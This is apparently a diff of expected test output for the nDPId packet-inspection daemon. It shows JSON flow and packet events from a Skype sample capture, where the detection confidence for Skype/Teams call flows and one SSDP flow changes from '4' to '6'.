-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/TKMAAEAR42DAqAEinTfrqDLdnFgAKzONesUCSrWxfzMM\/u+ve5H0njBV7f1MGIL\/NDrkYJJdktuSF9Y="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5mqYAAEARlXzAqAEinTfrjzLdnF4AJa4yescCvwHYJJA0SDNaHmIGriSDO5fklPid0RnUmyQ="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1cmsAAEARiRbAqAEib91NjzLdnFYAIbzweskC5JgrRdKtWjAuXzT2S5r85LjjhllfqQ=="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA42pAAAEARJFHAqAEib91KLDLdnFMAJIhoessC81Jpsjijfp0Q\/Q0jMgS+1lTSx5HXr8lZjQ=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zV0AAEARYhbAqAEi1cezrTLdnE0AJlZnes0Ccg7v+3Lfid3osaqIFpFm\/v4o\/QqgzaHMxbGQ"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1vrcAAEARJFjAqAEinTc4pzLdnFgAIREees8CCCEtcEeglQLd7mhp21iK7rcni5fedw=="} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9vysAAEARohHAqAEiQAQXpTLdnEQAKTALetECX1BVIaBDDxsr7kKWybF1ggh0MeIv40Hl0rhawj9H"} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4G6EAAEARfQHAqAEiQTffETLdnFkAJOrWetMCvMga3ljFR4ptkQ1XTBYwQJAI0\/6MTBVdPQ=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1FVUAAEARg0\/AqAEiQTffEjLdgQkAIczZetUCcHkMN3GT\/RrB0G0KocMuGJme8meMAw=="} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431970648367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1431970648367,"pkt":"AQBef\/\/6oPPBbTu2CABFAAE\/BH4AAAQR\/4\/AqAD+7\/\/\/+gQBB2wBK+71Tk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cG5wOnJvb3RkZXZpY2UNCg0K"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 